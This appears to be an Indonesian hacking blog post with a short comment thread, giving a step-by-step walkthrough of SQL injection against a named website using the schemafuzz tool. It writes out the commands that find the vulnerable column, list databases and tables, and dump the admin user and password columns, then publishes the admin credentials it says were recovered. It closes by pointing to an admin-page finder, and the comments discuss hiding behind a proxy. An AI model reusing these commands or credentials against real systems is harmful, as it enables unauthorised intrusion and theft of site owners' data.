1:10 AM
secure your world
Bengang bengong di kosan daripada bete gg ada kerjaan gw iseng-iseng aja nyari target dengan menggunakan sqli.. kemudian dari pada repot dengan menggunakan sql injeksion saya pake schemafuzz aja biar simple gg bertele" hehehee
sebelum kita menggunakan schemafuzz pada windows terlebih utama kita menginstall perl serta python untuk memanggil schemafuzz,dll... krna scehmafuzz menggunakan python ....
bagi yg belum punya bisa di download di sini
setlah kita install maka cari target !!
target yg saya gunakan kali ini adalah www.kasumbo.com/products.php?id=8
kemudian kita bangkitkan schemafuzz kita.... setelah bangkit sang schemafuzz kita dari kuburnya kita langsung ketikan
schemafuzz.py --findcol -u www.kasumbo.com/products.php?id=8
setelah itu dengan secara otomatis akan mencari dmna bug dari situs si target...
nah sekarang dia sudah mencari dmna bug berada... langkah selanjutnya adalah kita mencari nama database target kita dengan mengetik:
schemafuzz.py --dbs -u www.kasumbo.com/products.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,4,5,6,7
catatan "darkc0de" itu nol(angka) ya bukan o(huruf)
nah setelah kita menemukan nama database tersebut kita cari column serta table dari databasenya yakni dengan mengtikan : schemafuzz.py --schema -u www.kasumbo.com/products.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,4,5,6,7 -D kasumbo
-D (nama databasenya loh) lalu hasilnya akan seperti ini:
Muncul dah tuh table serta column dari target kita... langkah selanjutnya yg kita ambil adalah mendumping halaman table serta column yg kita mau .... klo memang kita ingin mencari password sang admin dari target tersebut maka kita cari halaman table serta kolumn yg berbau" admin sudah jelas yakni Table: admin dan Columnnya: user,pass !! setelah itu kita ketik deh:
schemafuzz.py --dump -u www.kasumbo.com/products.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,4,5,6,7 -D kasumbo -T admin -C user,pass
nah sekarang ketemu deh nama idnya yaitu admin dan passwordnya adalah kingmouse
setelah itu kita cari deh halaman admin target kita dengan menggunakan admin.pl
tinggal kita masukin situs si target yg mau kita cari adminnya
selamat menikmati..... ____-----=====Science belongs to all people GO INDONESIAN IT=====-----_____
2 komentar:
dod,,
klo pgn jalan2 kya gtu..
harus pake proxy gag?
pa lgs aja?
jalan" kaya gmna maksudnya bang ??
klo ada proxynya boleh juga tuh di pake...
tapi lebih baik klo scrytpnya di jalanin di shell...
jadi lebih cepet
Post a Comment